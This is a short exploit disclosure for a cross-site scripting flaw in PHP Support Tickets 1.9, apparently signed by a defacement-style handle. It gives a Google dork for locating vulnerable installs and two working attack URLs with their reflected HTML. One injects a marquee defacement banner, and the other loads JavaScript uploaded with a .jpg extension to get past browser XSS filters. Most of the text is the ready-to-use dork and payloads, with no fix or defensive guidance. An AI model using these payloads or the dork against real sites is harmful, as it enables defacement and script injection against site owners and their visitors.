PHP Support Tickets version 1.9 suffers from a cross site scripting vulnerability.
cf9f3edba165acca992de02c1ba78353df5d2c12b3db9021395b0b36f94cd88d
Google dork:
"PHP Support Tickets v1.9" inurl:index.php?action=
"PHP Support Tickets v1.9" by "Triangle Solutions Ltd" allows XSS attack at
index.php and some implementations also has a bad uploaded files validation
allowing to upload a js with a jpg extension that could be using for
bypassing XSS browser filters.
Demo 1 (XSS):
url:
http://server.com/app_folder/index.php?action=Register<marquee><h1>Sys_A501%
20@%20Raza-Mexicana.org</h1></marquee>
Code:
<!-- PHP Support Tickets Manager - Triangle Solutions Ltd /-->
<!-- END OF HEADER FILE -->
<table width="75%" cellspacing="1" cellpadding="1"
class="boxborder" align="center">
<tr>
<td class="boxborder text"
bgcolor="#AABBDD">Register<marquee><h1>Sys_A501 @
Raza-Mexicana.org</h1></marquee></td>
Demo 2 (JS as JPEG):
url:
http://server.com/app_folder/index.php?action=Login%3Cscript%20src=./upload/
1671.jpg%3E%3C/script%3E
Code:
<!-- PHP Support Tickets Manager - Triangle Solutions Ltd /-->
<!-- END OF HEADER FILE -->
<table width="75%" cellspacing="1" cellpadding="1"
class="boxborder" align="center">
<tr>
<td class="boxborder text"
bgcolor="#AABBDD">Login<script src=./upload/1671.jpg></script></td>
Sys_A501
sys_a501@raza-mexicana.org
sys.a501@gmail.com
www.raza-mexicana.org
http://inrootwetrust.org.mx/